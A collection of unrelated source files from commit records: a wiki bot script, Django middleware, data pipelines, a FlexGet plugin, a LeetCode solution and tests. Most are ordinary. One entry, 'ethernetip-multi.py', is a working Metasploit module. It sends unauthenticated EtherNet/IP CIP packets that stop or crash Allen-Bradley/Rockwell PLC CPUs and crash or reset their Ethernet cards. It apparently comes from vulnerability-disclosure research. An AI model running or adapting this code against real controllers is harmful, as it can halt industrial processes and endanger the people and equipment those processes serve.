a857273666cb616e1c019bedff81d3014070c896 | increase Proofread of Henochbuch | the-it/WS_THEbotIT,the-it/WS_THEbotIT | scripts/online_scripts/150916_increase_proofread_Henochbuch.py | scripts/online_scripts/150916_increase_proofread_Henochbuch.py | # -*- coding: utf-8 -*-
__author__ = 'eso'
import sys
sys.path.append('../../')
from tools.catscan import CatScan
import re
import requests
import pywikibot
from pywikibot import proofreadpage
site = pywikibot.Site()
for i in range(455, 474):
page = pywikibot.proofreadpage.ProofreadPage(site, 'Seite:Riessler Altjuedisches Schrifttum ausserhalb der Bibel {}.jpg'.format(i))
print(page.status)
page._full_header.user = 'THEbotIT'
page.proofread()
page.save()
| mit | Python | |
1d75b7e0bd0c498b5ea2c32c4e98a278ca2aed1b | make sitelockdown generic | avlach/univbris-ocf,avlach/univbris-ocf,avlach/univbris-ocf,avlach/univbris-ocf | src/python/expedient/common/middleware/sitelockdown.py | src/python/expedient/common/middleware/sitelockdown.py | '''
@author jnaous
'''
from django.conf import settings
from django.http import HttpResponseRedirect
from utils import RegexMatcher
class SiteLockDown(RegexMatcher):
"""
This middleware class will force almost every request coming from
Django to be authenticated, or it will redirect the user to a login
page. Some urls can be excluded by specifying their regexes in the
C{SITE_LOCKDOWN_EXCEPTIONS} tuple in the settings.
Hints from: http://davyd.livejournal.com/262859.html
"""
def __init__(self):
super(SiteLockDown, self).__init__("SITE_LOCKDOWN_EXCEPTIONS")
def process_request (self, request):
try:
request.django_root
except AttributeError:
request.django_root = ''
login_url = settings.LOGIN_URL + '?next=%s' % request.path
if request.path.startswith(request.django_root):
path = request.path[len(request.django_root):]
else:
return HttpResponseRedirect (login_url)
if not request.user.is_authenticated () and not \
(path == settings.LOGIN_URL or
self.matches(path)
):
return HttpResponseRedirect (login_url)
return None
| bsd-3-clause | Python | |
4f8fff9fb2da7bbdab68a0a4c02b51d00410e8c4 | Add synthtool scripts (#3765) | googleapis/google-cloud-java,googleapis/google-cloud-java,googleapis/google-cloud-java | java-automl/google-cloud-automl/synth.py | java-automl/google-cloud-automl/synth.py | # Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This script is used to synthesize generated parts of this library."""
import synthtool as s
import synthtool.gcp as gcp
gapic = gcp.GAPICGenerator()
common_templates = gcp.CommonTemplates()
library = gapic.java_library(
service='automl',
version='v1beta1',
config_path='artman_automl_v1beta1.yaml',
artman_output_name='')
s.copy(library / 'gapic-google-cloud-automl-v1beta1/src', 'src')
s.copy(library / 'grpc-google-cloud-automl-v1beta1/src', '../../google-api-grpc/grpc-google-cloud-automl-v1beta1/src')
s.copy(library / 'proto-google-cloud-automl-v1beta1/src', '../../google-api-grpc/proto-google-cloud-automl-v1beta1/src')
| apache-2.0 | Python | |
dacd4e66a367987a84ae13da4e1ad74a4113b25c | Create Congress.py | JohnDvorak/senate-webcrawler | Congress.py | Congress.py | #
# Author : John Dvorak
# Contact : jcd3247@rit.edu
# File : Congress.py
# Usage : Senate parser & webcrawler
#
""" Contains Bill and Politician objects. A Bill represents a proposed bill
from the U.S. Senate or House of Representatives, and a set of
Politicians are created who cosponsor a given set of Bills.
"""
class Bill(object):
''' A container object for a single Bill introduced during the a given term. '''
def __init__(self,bill_dict):
""" Fills out the Bill's info using a dictionary from the Sunlight API """
# All Bills are guarenteed to have these fields
self.bill_id = bill_dict['bill_id']
self.number = bill_dict['number']
self.name = bill_dict['official_title']
self.sponsor = bill_dict['sponsor_id']
self.cosponsors = bill_dict['cosponsor_ids']
self.congress = bill_dict['congress'] # For example, '112'
self.branch = bill_dict['chamber'].capitalize()
def __repr__(self):
""" A Bill's __repr__ is simply the Bill number. """
return "Bill #" + str(self.number)
def __str__(self):
""" The __str__ representation outputs the bill's main info on 5 lines. """
return "Bill #" + str(self.number) + ":" + \
"\n" + self.name + \
"\nIntroduced in the " + str(self.congress) + "th " + self.branch + \
"\nsponsored by " + self.sponsor + \
"\nwith %i cosponsors" % len(self.cosponsors)
class Politician(object):
""" An general class to be used as either a U.S. Senator or a U.S. Representative """
# Class variables used in the parser to consistently ensure one of two branches
# is being analyzed
HOUSE = 'House'
SENATE = 'Senate'
def __init__(self, bio_dict):
""" Fills out the Politician's info using a dictionary from the Sunlight API """
# All Politicians are guarenteed to have these fields
self.branch = bio_dict['chamber'] # 'senate' or 'house'
self.first_name = bio_dict['first_name'] # 'Arthur'
self.last_name = bio_dict['last_name'] # 'Smith'
self.title = bio_dict['title'] # 'Sen' or 'Rep'
self.state = bio_dict['state'] # 'IA'
self.party = bio_dict['party'] # 'R','D', or 'I'
self.bioguide_id = bio_dict['bioguide_id'] # 'B001242'
self.bills = [] # ['hr1762-112','hr1312-112',...]
def __repr__(self):
''' The one-line representation of the object: "Rep Arthur Smith(R-IA)" '''
return self.title + " " + self.first_name + " " + self.last_name + self.suffix()
def suffix(self):
''' Gets the proper suffix that represents the Politician.
For example, Joe Smith (R-IA) '''
return '(' + self.party + '-' + self.state + ')'
def __str__(self):
''' Two-line output of the Politician such as:
"Rep Arthur Smith(R-IA) was involved in 15 bills." '''
return self.title + " " + self.first_name + " " + self.last_name + \
self.suffix() + " was involved in %i bills." % len(self.bills)
| mit | Python | |
3dd454f899f556d99ae2bc6947a21d04428f8496 | Add the extraction for DCE signal normalized to accelerate the loading | I2Cvb/mp-mri-prostate,I2Cvb/mp-mri-prostate,I2Cvb/mp-mri-prostate | pipeline/feature-extraction/dce/pipeline_extraction_dce.py | pipeline/feature-extraction/dce/pipeline_extraction_dce.py | """
This pipeline is used to resave the data from lemaitre-2016-nov for faster
loading.
"""
import os
import numpy as np
from sklearn.externals import joblib
from sklearn.preprocessing import label_binarize
from protoclass.data_management import DCEModality
from protoclass.data_management import GTModality
from protoclass.preprocessing import StandardTimeNormalization
from protoclass.extraction import EnhancementSignalExtraction
from protoclass.classification import Classify
# Define the path where all the patients are
path_patients = '/data/prostate/experiments'
# Define the path of the modality to normalize
path_dce = 'DCE_reg_bspline'
# Define the path of the ground for the prostate
path_gt = ['GT_inv/prostate', 'GT_inv/pz', 'GT_inv/cg', 'GT_inv/cap']
# Define the label of the ground-truth which will be provided
label_gt = ['prostate', 'pz', 'cg', 'cap']
# Define the path to the normalization parameters
path_norm = '/data/prostate/pre-processing/lemaitre-2016-nov/norm-objects'
# Define the path to store the Tofts data
path_store = '/data/prostate/extraction/mp-mri-prostate/ese-dce'
# Generate the different path to be later treated
path_patients_list_dce = []
path_patients_list_gt = []
# Create the generator
id_patient_list = [name for name in os.listdir(path_patients)
if os.path.isdir(os.path.join(path_patients, name))]
for id_patient in id_patient_list:
# Append for the DCE data
path_patients_list_dce.append(os.path.join(path_patients, id_patient,
path_dce))
# Append for the GT data - Note that we need a list of gt path
path_patients_list_gt.append([os.path.join(path_patients, id_patient, gt)
for gt in path_gt])
# Load all the data once. Splitting into training and testing will be done at
# the cross-validation time
for idx_pat in range(len(id_patient_list)):
print 'Read patient {}'.format(id_patient_list[idx_pat])
# Load the testing data that correspond to the index of the LOPO
# Create the object for the DCE
dce_mod = DCEModality()
dce_mod.read_data_from_path(path_patients_list_dce[idx_pat])
print 'Read the DCE data for the current patient ...'
# Create the corresponding ground-truth
gt_mod = GTModality()
gt_mod.read_data_from_path(label_gt,
path_patients_list_gt[idx_pat])
print 'Read the GT data for the current patient ...'
# Load the approproate normalization object
filename_norm = (id_patient_list[idx_pat].lower().replace(' ', '_') +
'_norm.p')
dce_norm = StandardTimeNormalization.load_from_pickles(
os.path.join(path_norm, filename_norm))
dce_mod = dce_norm.normalize(dce_mod)
# Create the object to extrac data
dce_ese = EnhancementSignalExtraction(DCEModality())
# Concatenate the training data
data = dce_ese.transform(dce_mod, gt_mod, label_gt[0])
# Check that the path is existing
if not os.path.exists(path_store):
os.makedirs(path_store)
pat_chg = (id_patient_list[idx_pat].lower().replace(' ', '_') +
'_ese_' + '_dce.npy')
filename = os.path.join(path_store, pat_chg)
np.save(filename, data)
| mit | Python | |
c7987bde28992ef0ae8cae9fca500730b2fcea15 | Add url rewriter for eztv | jawilson/Flexget,crawln45/Flexget,ZefQ/Flexget,crawln45/Flexget,crawln45/Flexget,grrr2/Flexget,poulpito/Flexget,tobinjt/Flexget,ianstalk/Flexget,dsemi/Flexget,Flexget/Flexget,Flexget/Flexget,OmgOhnoes/Flexget,qk4l/Flexget,jacobmetrick/Flexget,JorisDeRieck/Flexget,ZefQ/Flexget,tsnoam/Flexget,Danfocus/Flexget,antivirtel/Flexget,voriux/Flexget,thalamus/Flexget,tobinjt/Flexget,thalamus/Flexget,ianstalk/Flexget,antivirtel/Flexget,spencerjanssen/Flexget,xfouloux/Flexget,qvazzler/Flexget,Pretagonist/Flexget,LynxyssCZ/Flexget,malkavi/Flexget,offbyone/Flexget,X-dark/Flexget,vfrc2/Flexget,xfouloux/Flexget,spencerjanssen/Flexget,JorisDeRieck/Flexget,thalamus/Flexget,patsissons/Flexget,ianstalk/Flexget,tsnoam/Flexget,OmgOhnoes/Flexget,cvium/Flexget,lildadou/Flexget,antivirtel/Flexget,crawln45/Flexget,lildadou/Flexget,qvazzler/Flexget,jacobmetrick/Flexget,Flexget/Flexget,qvazzler/Flexget,ibrahimkarahan/Flexget,cvium/Flexget,drwyrm/Flexget,offbyone/Flexget,sean797/Flexget,dsemi/Flexget,camon/Flexget,jawilson/Flexget,lildadou/Flexget,oxc/Flexget,gazpachoking/Flexget,jacobmetrick/Flexget,malkavi/Flexget,grrr2/Flexget,cvium/Flexget,jawilson/Flexget,malkavi/Flexget,patsissons/Flexget,Pretagonist/Flexget,tvcsantos/Flexget,camon/Flexget,sean797/Flexget,poulpito/Flexget,ZefQ/Flexget,dsemi/Flexget,spencerjanssen/Flexget,jawilson/Flexget,voriux/Flexget,LynxyssCZ/Flexget,OmgOhnoes/Flexget,qk4l/Flexget,ratoaq2/Flexget,tobinjt/Flexget,X-dark/Flexget,drwyrm/Flexget,offbyone/Flexget,JorisDeRieck/Flexget,ratoaq2/Flexget,oxc/Flexget,ibrahimkarahan/Flexget,tvcsantos/Flexget,vfrc2/Flexget,poulpito/Flexget,Pretagonist/Flexget,ibrahimkarahan/Flexget,qk4l/Flexget,ratoaq2/Flexget,patsissons/Flexget,gazpachoking/Flexget,tsnoam/Flexget,v17al/Flexget,oxc/Flexget,v17al/Flexget,X-dark/Flexget,tarzasai/Flexget,tarzasai/Flexget,LynxyssCZ/Flexget,JorisDeRieck/Flexget,LynxyssCZ/Flexget,sean797/Flexget,xfouloux/Flexget,malkavi/Flexget,Danfocus/Flexget,Danfocus/Flexget,Danfocus/Flexget,v17al/Flexget,grrr2/Flexget,tarzasai/Flexget,tobinjt/Flexget,vfrc2/Flexget,drwyrm/Flexget,Flexget/Flexget | flexget/plugins/urlrewrite_eztv.py | flexget/plugins/urlrewrite_eztv.py | from __future__ import unicode_literals, division, absolute_import
import re
import logging
from urlparse import urlparse, urlunparse
from requests import RequestException
from flexget import plugin
from flexget.event import event
from flexget.plugins.plugin_urlrewriting import UrlRewritingError
from flexget.utils import requests
from flexget.utils.soup import get_soup
log = logging.getLogger('eztv')
EZTV_MIRRORS = [
('http', 'eztv.it'),
('https', 'eztv-proxy.net'),
('http', 'eztv.come.in')]
class UrlRewriteEztv(object):
"""Eztv url rewriter."""
def url_rewritable(self, task, entry):
return urlparse(entry['url']).netloc == 'eztv.it'
def url_rewrite(self, task, entry):
url = entry['url']
for (scheme, netloc) in EZTV_MIRRORS:
try:
_, _, path, params, query, fragment = urlparse(url)
url = urlunparse((scheme, netloc, path, params, query, fragment))
page = requests.get(url).content
except RequestException as e:
log.debug('Eztv mirror `%s` seems to be down', url)
continue
break
if not page:
raise UrlRewritingError('No mirrors found for url %s' % entry['url'])
log.debug('Eztv mirror `%s` chosen', url)
try:
soup = get_soup(page)
mirrors = soup.find('a', attrs={'class': re.compile(r'download_\d')})
if not mirrors:
raise UrlRewritingError('Unable to locate download link from url %s'
% url)
entry['urls'] = [m.get('href') for m in mirrors]
entry['url'] = mirrors[0].get('href')
except Exception as e:
raise UrlRewritingError(e)
@event('plugin.register')
def register_plugin():
plugin.register(UrlRewriteEztv, 'eztv', groups=['urlrewriter'], api_ver=2)
| mit | Python | |
c60b152573ccfe01997f3d970968180ac82af8ba | Add forgotten migration | onepercentclub/bluebottle,onepercentclub/bluebottle,onepercentclub/bluebottle,onepercentclub/bluebottle,onepercentclub/bluebottle | bluebottle/funding_stripe/migrations/0014_auto_20190916_1645.py | bluebottle/funding_stripe/migrations/0014_auto_20190916_1645.py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.15 on 2019-09-16 14:45
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('funding_stripe', '0013_auto_20190913_1458'),
]
operations = [
migrations.AlterField(
model_name='stripepayoutaccount',
name='document_type',
field=models.CharField(blank=True, max_length=20),
),
]
| bsd-3-clause | Python | |
7d6932a07caed84c424f62ab8d980fde7eddeaed | Create lc375.py | FiveEye/ProblemSet,FiveEye/ProblemSet | LeetCode/lc375.py | LeetCode/lc375.py | class Solution(object):
def getMoneyAmount(self, n):
"""
:type n: int
:rtype: int
"""
dp = [[0 for x in range(n+1)] for y in range(n+1)]
for i in range(2,n+1):
for x in range(n):
if x + i > n:
break
dp[x][x+i] = x+1 + dp[x+1][x+i]
for j in range(x+1, x+i):
tmp = max(dp[x][j], dp[j+1][x+i]) + (j+1)
if tmp < dp[x][x+i]:
dp[x][x+i] = tmp
print(dp[0])
return dp[0][n]
| mit | Python | |
74d718b19ec49c0ca4c724533af1ec725003adef | remove emtry transtion of region | affan2/django-cities-light,affan2/django-cities-light | cities_light/management/commands/region_missing_translations.py | cities_light/management/commands/region_missing_translations.py | from django.core.management.base import BaseCommand
class Command(BaseCommand):
def handle(self, *args, **options):
from cities_light import Region
for item in Region.published.all():
if not item.translations.all():
obj = item.translate(item.default_language)
obj.name = "no region name given"
obj.display_name = "no region name given"
obj.save() | mit | Python | |
8578d221498eee26be8cbd27849ac9a4fbfc27a5 | Create ethernetip-multi.py | digitalbond/Basecamp,digitalbond/Basecamp | ethernetip-multi.py | ethernetip-multi.py | require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Rex::Socket::Tcp
def initialize(info={})
super(update_info(info,
'Name' => 'Allen-Bradley/Rockwell Automation EtherNet/IP CIP commands',
'Description' => %q{
The EtnerNet/IP CIP protocol allows a number of unauthenticated commands to a PLC which
implements the protocol. This module implements the CPU STOP command, as well as
the ability to crash the Ethernet card in an affected device.
},
'Author' => ['Ruben Santamarta <ruben@reversemode.com>',
'K. Reid Wightman <wightman@digitalbond.com>'],
'License' => MSF_LICENSE,
'Version' => '$Revision: 1 $',
'DisclosureDate'=> 'Jan 19 2012'))
register_options(
[
Opt::RHOST('127.0.0.1'),
Opt::RPORT(44818),
OptString.new('ATTACK', [true, "The attack to use. Valid values: STOPCPU, CRASHCPU, CRASHETHER", "STOPCPU"])
], self.class
)
end
def forgepacket(sessionid, payload)
packet = ""
packet += "\x6f\x00" # command: Send request/reply data
packet += [payload.size - 0x10].pack("v") # encap length (2 bytes)
packet += [sessionid].pack("N") # session identifier (4 bytes)
packet += payload #payload part
begin
sock.put(packet)
rescue ::Interrupt
print_error("Interrupt during payload")
raise $!
rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused
print_error("Network error during payload")
return nil
end
end
def reqsession
packet = ""
packet += "\x65\x00" # ENCAP_CMD_REGISTERSESSION (2 bytes)
packet += "\x04\x00" # encaph_length (2 bytes)
packet += "\x00\x00\x00\x00" # session identifier (4 bytes)
packet += "\x00\x00\x00\x00" # status code (4 bytes)
packet += "\x00\x00\x00\x00\x00\x00\x00\x00" # context information (8 bytes)
packet += "\x00\x00\x00\x00" # options flags (4 bytes)
packet += "\x01\x00" # proto (2 bytes)
packet += "\x00\x00" # flags (2 bytes)
begin
sock.put(packet)
response = sock.get_once(-1,8)
session_id = response[4..8].unpack("N")[0] # bare minimum of parsing done
print_status("Got session id: 0x0"+session_id.to_s(16))
rescue ::Interrupt
print_error("Interrupt during session negotation")
raise $!
rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused
print_error("Network error during session negotiation")
return nil
end
return session_id
end
def cleanup
disconnect
end
def run
payload = ""
attack = datastore["ATTACK"]
case attack
when "STOPCPU"
payload = "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + #encapsulation -[payload.size-0x10]-
"\x00\x00\x00\x00\x02\x00\x02\x00\x00\x00\x00\x00\xb2\x00\x1a\x00" + #packet1
"\x52\x02\x20\x06\x24\x01\x03\xf0\x0c\x00\x07\x02\x20\x64\x24\x01" + #packet2
"\xDE\xAD\xBE\xEF\xCA\xFE\x01\x00\x01\x00" #packet3
when "CRASHCPU"
payload = "\x00\x00\x00\x00\x02\x00\x02\x00\x00\x00\x00\x00\xb2\x00\x1a\x00" +
"\x52\x02\x20\x06\x24\x01\x03\xf0\x0c\x00\x0a\x02\x20\x02\x24\x01" +
"\xf4\xf0\x09\x09\x88\x04\x01\x00\x01\x00"
when "CRASHETHER"
payload = "\x00\x00\x00\x00\x20\x00\x02\x00\x00\x00\x00\x00\xb2\x00\x0c\x00" +
"\x0e\x03\x20\xf5\x24\x01\x10\x43\x24\x01\x10\x43"
when "RESETETHER"
payload = "\x00\x00\x00\x00\x00\x04\x02\x00\x00\x00\x00\x00\xb2\x00\x08\x00" +
"\x05\x03\x20\x01\x24\x01\x30\x03"
else
print_error("Invalid attack option. Choose STOPCPU, CRASHCPU, CRASHETHER, or RESETETHER")
return
end
connect
sid = reqsession
if sid
forgepacket(sid, payload)
end
end
end
| mit | Python | |
e20002febd14a2f6d31b43ee85d57bfa26c745e5 | test game/board.py | ciappi/Yaranullin | yaranullin/game/tests/board.py | yaranullin/game/tests/board.py | # yaranullin/game/tests/board.py
#
# Copyright (c) 2012 Marco Scopesi <marco.scopesi@gmail.com>
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
import unittest
import sys
if __name__ == '__main__':
sys.path.insert(0, ".")
from yaranullin.game.board import Board
class TestBoard(unittest.TestCase):
def setUp(self):
self.size = (100, 200)
self.name = 'Test dungeon'
self.board = Board(self.name, self.size)
def test_create_pawn(self):
pos = 3, 4
size = 5, 6
pawn = self.board.create_pawn('Dragon', 35, pos, size)
self.assertIn(pawn.name, self.board.pawns)
self.assertIs(pawn, self.board.pawns[pawn.name])
self.assertIn(pawn, self.board.initiatives)
def del_pawn(self):
pos = 3, 4
size = 5, 6
self.board.create_pawn('Dragon', 35, pos, size)
pawn = self.board.del_pawn('Dragon')
self.assertNotIn(pawn.name, self.board.pawns)
self.assertIsNot(pawn, self.board.pawns[pawn.name])
self.assertNotIn(pawn, self.board.initiatives)
if __name__ == '__main__':
unittest.main()
| isc | Python |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.